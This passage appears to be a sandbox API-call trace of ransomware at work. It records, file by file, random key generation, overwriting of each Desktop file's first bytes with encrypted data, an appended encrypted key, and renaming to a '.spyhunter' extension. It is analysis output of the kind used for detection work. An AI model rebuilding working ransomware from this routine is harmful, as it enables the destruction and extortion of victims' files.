(HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.764] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef00*=0x30) returned 1 [0149.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\3lf_cBxmy_8p.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\3lf_cbxmy_8p.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\3lf_cBxmy_8p.doc") returned 77 [0149.764] StrStrW (lpFirst="3lf_cBxmy_8p.doc", lpSrch=".txt") returned 0x0 [0149.764] GetProcessHeap () returned 0x2c0000 [0149.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.764] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eec4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248eec4*=0x2800, lpOverlapped=0x0) returned 1 [0149.765] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.765] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eec4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248eec4*=0x2800, lpOverlapped=0x0) returned 1 [0149.765] GetProcessHeap () returned 0x2c0000 [0149.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.765] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.765] WriteFile (in: hFile=0x178, lpBuffer=0x248ef04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eec4, lpOverlapped=0x0 | out: lpBuffer=0x248ef04*, lpNumberOfBytesWritten=0x248eec4*=0x4, lpOverlapped=0x0) returned 1 [0149.765] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eec4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eec4*=0x30, lpOverlapped=0x0) returned 1 [0149.765] CloseHandle (hObject=0x178) returned 1 [0149.765] GetProcessHeap () returned 0x2c0000 [0149.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.766] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\3lf_cBxmy_8p.doc.spyhunter") returned 87 [0149.766] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\3lf_cBxmy_8p.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\3lf_cbxmy_8p.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\3lf_cBxmy_8p.doc.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\3lf_cbxmy_8p.doc.spyhunter")) returned 1 [0149.766] GetProcessHeap () returned 0x2c0000 [0149.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.766] GetProcessHeap () returned 0x2c0000 [0149.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.766] GetProcessHeap () returned 0x2c0000 [0149.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ef60 | out: hHeap=0x2c0000) returned 1 [0149.766] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef00 | out: pbBuffer=0x248ef00) returned 1 [0149.766] GetProcessHeap () returned 0x2c0000 [0149.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.767] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eef8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eef8*=0x30) returned 1 [0149.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hyFg6XxebgY_Z.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hyfg6xxebgy_z.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.767] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hyFg6XxebgY_Z.mp4") returned 59 [0149.767] StrStrW (lpFirst="hyFg6XxebgY_Z.mp4", lpSrch=".txt") returned 0x0 [0149.767] GetProcessHeap () returned 0x2c0000 [0149.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.767] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eebc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248eebc*=0x2800, lpOverlapped=0x0) returned 1 [0149.768] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.768] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eebc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248eebc*=0x2800, lpOverlapped=0x0) returned 1 [0149.768] GetProcessHeap () returned 0x2c0000 [0149.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.768] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.768] WriteFile (in: hFile=0x178, lpBuffer=0x248eefc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eebc, lpOverlapped=0x0 | out: lpBuffer=0x248eefc*, lpNumberOfBytesWritten=0x248eebc*=0x4, lpOverlapped=0x0) returned 1 [0149.768] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eebc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eebc*=0x30, lpOverlapped=0x0) returned 1 [0149.768] CloseHandle (hObject=0x178) returned 1 [0149.768] GetProcessHeap () returned 0x2c0000 [0149.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.769] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hyFg6XxebgY_Z.mp4.spyhunter") returned 69 [0149.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hyFg6XxebgY_Z.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hyfg6xxebgy_z.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hyFg6XxebgY_Z.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hyfg6xxebgy_z.mp4.spyhunter")) returned 1 [0149.770] GetProcessHeap () returned 0x2c0000 [0149.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.770] GetProcessHeap () returned 0x2c0000 [0149.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.771] GetProcessHeap () returned 0x2c0000 [0149.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ceb8 | out: hHeap=0x2c0000) returned 1 [0149.771] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef00 | out: pbBuffer=0x248ef00) returned 1 [0149.771] GetProcessHeap () returned 0x2c0000 [0149.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.771] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eef8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eef8*=0x30) returned 1 [0149.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GIAZ6X0mb4FlQev.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\giaz6x0mb4flqev.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.771] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GIAZ6X0mb4FlQev.pps") returned 61 [0149.771] StrStrW (lpFirst="GIAZ6X0mb4FlQev.pps", lpSrch=".txt") returned 0x0 [0149.771] GetProcessHeap () returned 0x2c0000 [0149.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.771] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eebc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248eebc*=0x2800, lpOverlapped=0x0) returned 1 [0149.772] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.772] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eebc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248eebc*=0x2800, lpOverlapped=0x0) returned 1 [0149.772] GetProcessHeap () returned 0x2c0000 [0149.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.773] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.773] WriteFile (in: hFile=0x178, lpBuffer=0x248eefc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eebc, lpOverlapped=0x0 | out: lpBuffer=0x248eefc*, lpNumberOfBytesWritten=0x248eebc*=0x4, lpOverlapped=0x0) returned 1 [0149.773] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eebc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eebc*=0x30, lpOverlapped=0x0) returned 1 [0149.773] CloseHandle (hObject=0x178) returned 1 [0149.773] GetProcessHeap () returned 0x2c0000 [0149.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.773] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GIAZ6X0mb4FlQev.pps.spyhunter") returned 71 [0149.773] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GIAZ6X0mb4FlQev.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\giaz6x0mb4flqev.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GIAZ6X0mb4FlQev.pps.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\giaz6x0mb4flqev.pps.spyhunter")) returned 1 [0149.774] GetProcessHeap () returned 0x2c0000 [0149.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.774] GetProcessHeap () returned 0x2c0000 [0149.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.774] GetProcessHeap () returned 0x2c0000 [0149.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x2c0000) returned 1 [0149.774] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eef8 | out: pbBuffer=0x248eef8) returned 1 [0149.774] GetProcessHeap () returned 0x2c0000 [0149.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.774] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eef0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eef0*=0x30) returned 1 [0149.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fGQmnvsj6GmN.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fgqmnvsj6gmn.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fGQmnvsj6GmN.jpg") returned 58 [0149.775] StrStrW (lpFirst="fGQmnvsj6GmN.jpg", lpSrch=".txt") returned 0x0 [0149.775] GetProcessHeap () returned 0x2c0000 [0149.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.775] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eeb4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248eeb4*=0x2800, lpOverlapped=0x0) returned 1 [0149.776] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.776] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eeb4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248eeb4*=0x2800, lpOverlapped=0x0) returned 1 [0149.776] GetProcessHeap () returned 0x2c0000 [0149.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.776] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.776] WriteFile (in: hFile=0x178, lpBuffer=0x248eef4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eeb4, lpOverlapped=0x0 | out: lpBuffer=0x248eef4*, lpNumberOfBytesWritten=0x248eeb4*=0x4, lpOverlapped=0x0) returned 1 [0149.776] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eeb4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eeb4*=0x30, lpOverlapped=0x0) returned 1 [0149.776] CloseHandle (hObject=0x178) returned 1 [0149.777] GetProcessHeap () returned 0x2c0000 [0149.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.777] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fGQmnvsj6GmN.jpg.spyhunter") returned 68 [0149.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fGQmnvsj6GmN.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fgqmnvsj6gmn.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fGQmnvsj6GmN.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fgqmnvsj6gmn.jpg.spyhunter")) returned 1 [0149.779] GetProcessHeap () returned 0x2c0000 [0149.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.779] GetProcessHeap () returned 0x2c0000 [0149.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.779] GetProcessHeap () returned 0x2c0000 [0149.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2cdf8 | out: hHeap=0x2c0000) returned 1 [0149.779] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eef8 | out: pbBuffer=0x248eef8) returned 1 [0149.779] GetProcessHeap () returned 0x2c0000 [0149.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.779] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eef0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eef0*=0x30) returned 1 [0149.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f5da_fLXNej.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f5da_flxnej.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f5da_fLXNej.bmp") returned 57 [0149.780] StrStrW (lpFirst="f5da_fLXNej.bmp", lpSrch=".txt") returned 0x0 [0149.780] GetProcessHeap () returned 0x2c0000 [0149.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.780] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eeb4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248eeb4*=0x2800, lpOverlapped=0x0) returned 1 [0149.780] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.781] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eeb4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248eeb4*=0x2800, lpOverlapped=0x0) returned 1 [0149.781] GetProcessHeap () returned 0x2c0000 [0149.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.781] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.781] WriteFile (in: hFile=0x178, lpBuffer=0x248eef4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eeb4, lpOverlapped=0x0 | out: lpBuffer=0x248eef4*, lpNumberOfBytesWritten=0x248eeb4*=0x4, lpOverlapped=0x0) returned 1 [0149.781] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eeb4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eeb4*=0x30, lpOverlapped=0x0) returned 1 [0149.781] CloseHandle (hObject=0x178) returned 1 [0149.781] GetProcessHeap () returned 0x2c0000 [0149.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.781] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f5da_fLXNej.bmp.spyhunter") returned 67 [0149.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f5da_fLXNej.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f5da_flxnej.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f5da_fLXNej.bmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f5da_flxnej.bmp.spyhunter")) returned 1 [0149.782] GetProcessHeap () returned 0x2c0000 [0149.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.782] GetProcessHeap () returned 0x2c0000 [0149.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.782] GetProcessHeap () returned 0x2c0000 [0149.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2cd38 | out: hHeap=0x2c0000) returned 1 [0149.782] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eef0 | out: pbBuffer=0x248eef0) returned 1 [0149.782] GetProcessHeap () returned 0x2c0000 [0149.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.782] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eee8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eee8*=0x30) returned 1 [0149.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dYjt_tRIg 6.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dyjt_trig 6.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.783] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dYjt_tRIg 6.mp4") returned 57 [0149.783] StrStrW (lpFirst="dYjt_tRIg 6.mp4", lpSrch=".txt") returned 0x0 [0149.783] GetProcessHeap () returned 0x2c0000 [0149.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.783] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eeac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248eeac*=0x19db, lpOverlapped=0x0) returned 1 [0149.783] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe625, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.784] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x19db, lpNumberOfBytesWritten=0x248eeac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248eeac*=0x19db, lpOverlapped=0x0) returned 1 [0149.784] GetProcessHeap () returned 0x2c0000 [0149.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.784] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.784] WriteFile (in: hFile=0x178, lpBuffer=0x248eeec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eeac, lpOverlapped=0x0 | out: lpBuffer=0x248eeec*, lpNumberOfBytesWritten=0x248eeac*=0x4, lpOverlapped=0x0) returned 1 [0149.784] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eeac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eeac*=0x30, lpOverlapped=0x0) returned 1 [0149.784] CloseHandle (hObject=0x178) returned 1 [0149.784] GetProcessHeap () returned 0x2c0000 [0149.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.784] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dYjt_tRIg 6.mp4.spyhunter") returned 67 [0149.784] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dYjt_tRIg 6.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dyjt_trig 6.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dYjt_tRIg 6.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dyjt_trig 6.mp4.spyhunter")) returned 1 [0149.785] GetProcessHeap () returned 0x2c0000 [0149.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.785] GetProcessHeap () returned 0x2c0000 [0149.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.785] GetProcessHeap () returned 0x2c0000 [0149.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2cc78 | out: hHeap=0x2c0000) returned 1 [0149.785] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eef0 | out: pbBuffer=0x248eef0) returned 1 [0149.785] GetProcessHeap () returned 0x2c0000 [0149.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.785] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eee8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eee8*=0x30) returned 1 [0149.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dv8YHPtnDklF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dv8yhptndklf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.785] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dv8YHPtnDklF.mkv") returned 58 [0149.785] StrStrW 